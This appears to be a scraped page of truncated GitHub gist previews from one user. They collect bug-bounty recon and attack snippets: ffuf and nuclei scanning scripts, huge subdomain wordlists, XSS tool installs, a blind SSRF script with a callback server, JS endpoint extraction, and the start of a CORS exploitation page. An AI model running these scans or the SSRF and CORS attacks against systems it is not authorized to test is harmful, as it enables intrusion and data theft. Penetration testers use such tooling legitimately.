michaellcader

#!/bin/bash

echo "###############################"
echo "#           Ffuf              #"
echo "###############################"
echo ""
echo ""
echo "[1] subdomains.txt"
echo "[2] subdomain-large.txt"
echo "[3] raft-large-directories.txt"

michaellcader

🚨🔺15 Million Subdomain Wordlist🔻 🧱🔨👀

https://anonfiles.com/X3ddl4L5ob/15m_sub_wordlist.txt_zip

cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
 15677820 15m_sub_wordlist.txt

⏳🔺33 Million Subdomain Wordlist🔻🧱🔨👀

https://anonfiles.com/L6hfleLao0/33m-subdomain-wordlist.txt_zip

cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt

michaellcader

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

michaellcader

#!/bin/bash

OUT=~/nuclei-results/$1
TPL=~/nuclei-templates
mkdir -p ${OUT}
SUB=$(subfinder -d $1 -silent | httprobe | tee ${OUT}/$1.txt)

cd ${TPL}; git pull origin master && cd -
for tpl in $(find $TPL -name "*.yaml"); do $GOPATH/bin/nuclei -l ${OUT}/$1.txt -t $tpl -o "${OUT}/$(basename "$tpl" .yaml).txt"; done
find ${OUT} -name "*.txt" -size 0 -delete

michaellcader

###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###

gauq() {

michaellcader

echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
  echo >&2 "ERROR: Domain not set"
  exit 2
fi
if [ -z "$2" ]; then
  echo >&2 "ERROR: Sever link not set"
  exit 2

michaellcader

echo "https://www.example.com/?aaa=bbb&ccc=ddd" | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}' 

while read u; do echo $u | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'; done < plainurls.txt | sort -fu

From wayback json file:
cat waybackurls.json|jq -r '.[]'|grep 'http'|cut -d '"' -f 2 | while read u; do echo $u | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}'; done | sort -fu

function oparam {
  echo $1 | tr '?' '&' | awk -F '&' '{for(i=2;i<=NF;i++){split($i,t,"=");print t[1]}}' 
}

michaellcader

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# debug mode and absolute/relative urls support (the best one):
function ejs() {
   URL=$1;
   curl -L -k -s $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | t

michaellcader

#!/bin/bash

#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor

michaellcader

<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</div>
<script type="text/javascript">
var cont = 0;